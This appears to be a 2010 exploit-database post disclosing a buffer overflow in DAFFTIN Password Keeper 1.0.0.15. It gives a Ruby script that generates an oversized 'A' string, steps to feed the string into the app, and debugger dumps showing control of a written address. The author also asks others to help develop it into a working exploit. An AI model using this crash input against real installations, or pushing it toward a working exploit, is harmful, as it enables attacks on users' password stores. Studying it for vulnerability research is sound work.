|
# Exploit Title: DAFFTIN Password Keeper 1.0.0.15
# Date: 01/04/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/download_222389.html
# Version: 1.0.0.15
# Platform Tested on: Windows Xp Sp3 & Sp2
#code
!#/usr/bin/env ruby
test = "A" * 800000
puts test
Hey guys, managed to get an access violation when executing 41414141 but only after like 700000 "A's". its seems to cause an access violation after 60000 but only hits our code after roughly 700000 i have not managed to exploit this as it keeps the offset changes can anyone look into this and see if there is a way. here is a dump of the debugging. to test this open up the application , file -> new, save as test . choose a password eg test. then once your in the application to go accounts -> new, set title to test then print out the 700000 "A's" into the userid
or password box works for both, then click ok.
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013ae41 ebx=00ebbff0 ecx=00e00ab8 edx=00ec4000 esi=00ebc030 edi=00ec8004
eip=7c80bea9 esp=0013aeb4 ebp=0013aed8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!lstrcpyA+0x18:
7c80bea9 8802 mov byte ptr [edx],al ds:0023:00ec4000=??
0:000> g
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00ec4000 ebx=00ebbff0 ecx=35950941 edx=00ebc031 esi=00ebc030 edi=00ec8004
eip=7c80be64 esp=0013aeb8 ebp=0013aedc iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
kernel32!lstrlen+0x1e:
7c80be64 8a08 mov cl,byte ptr [eax] ds:0023:00ec4000=??
0:000> g
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00ec2a38 ecx=41414141 edx=41414141 esi=00010008 edi=00529638
eip=0047422a esp=0013ae30 ebp=0052963c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\DAFFTIN Password Keeper\PassKeeper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\DAFFTIN Password Keeper\PassKeeper.exe
PassKeeper+0x7422a:
0047422a 8902 mov dword ptr [edx],eax ds:0023:41414141=????????
0:000> dd eip
0047422a 50890289 90c35b04 158b9090 00529648
0047423a 4a8b10eb 72c13b08 0c4a0307 1672c13b
0047424a fa81128b 00529648 05c7e875 005295e8
0047425a 00000003 c28bd233 8b5390c3 04e983ca
0047426a 83011c8d 0f7c10fa 000703c7 d18b8000
0047427a 0001b9e8 83c35b00 0c7c04fa c981ca8b
0047428a 80000002 0b890889 05ffc35b 005295d8
0047429a ea83d08b 81128b04 fffffce2 04ea837f
0:000> dd eax
41414141 ???????? ???????? ???????? ????????
41414151 ???????? ???????? ???????? ????????
41414161 ???????? ???????? ???????? ????????
41414171 ???????? ???????? ???????? ????????
41414181 ???????? ???????? ???????? ????????
41414191 ???????? ???????? ???????? ????????
414141a1 ???????? ???????? ???????? ????????
414141b1 ???????? ???????? ???????? ????????
0:000> dd esp
0013ae30 00ec2a38 004746ce 0013ae6c 0013aecc
0013ae40 00ebc030 00010008 00474870 0013aea8
0013ae50 00474894 0013ae6c 0013aecc 00ebc030
0013ae60 00010001 00000000 00000000 0013ae84
0013ae70 004f098f 00010001 00474718 004748a8
0013ae80 00474c1c 0013ae90 004f088d 00010001
0013ae90 0013aed0 004f0112 00010001 00ec8004
0013aea0 00ebc030 00ebbff0 0013af2c 004f1257
|